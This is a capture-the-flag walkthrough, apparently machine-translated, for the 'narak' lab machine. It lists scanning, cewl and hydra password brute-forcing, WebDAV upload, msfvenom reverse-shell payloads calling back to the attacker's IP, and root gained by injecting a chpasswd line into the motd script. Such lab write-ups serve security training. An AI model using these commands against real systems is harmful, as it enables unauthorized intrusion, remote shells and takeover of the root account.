Target narak

The host found

nmap -sS 192.168.226.0/24

Port scanning

dirb Dictionary based directory scanning tool

Found three directories

Access the directory

Network storage file sharing WebDAV

Reuse hydra Below blasting
perhaps burpsuite Blast
yamdoot, Swarg

. Hydra （Hydra）
Medusa( Medusa )
patator
msf
Fine

use cewl The tool generates a dictionary by crawling the keywords of website information , Blasting through the generated dictionary

use hydra Blasting tools

-L Specify user name -P Specified password ip Address plus protocol plus path .http Is the agreement of the website ,get Is the request method used , Add path after

Try logging in again ：

No information available , Check the source code ：

cadaver Tool connection

cadaver http://192.168.8.132/webdav

username：yamdoot

password:Swarg

1. Baidu found webdav service , need cadaver Tool connection , After connecting, you can upload

Upload shell

nmap -O Found in fact linux System

msfvenom Create a Trojan

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf

monitor

Upload

liunx Failure, change to php Of

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

msf monitor
visit php file

shell Get

Raise the right Authority maintenance

Low authority

To view the user ：

mnt Catalog hell.sh

https://www.splitbrain.org/services/ook

brainfuck to text decode , Get decrypted content chitragupt It should be the password
chitragupt

Power raising assistant Raise the right github Open source project

https://github.com/mzet-/linux-exploit-suggester

linux Medium .sh How files are executed ？

1、 direct ./ Add file name .sh, If running hello.sh by ./hello.sh 【 The absolute path can also , but hello.sh There has to be x jurisdiction 】

chmod u+x hello.sh

Try one by one

Upload and unzip

use ssh Try logging in to another user , Enter the password you just decrypted , Found that the user logged in successfully

ssh [email protected]

echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header

Exit and reuse inferno Sign in

su -root

Succeed in getting root jurisdiction ： password inferno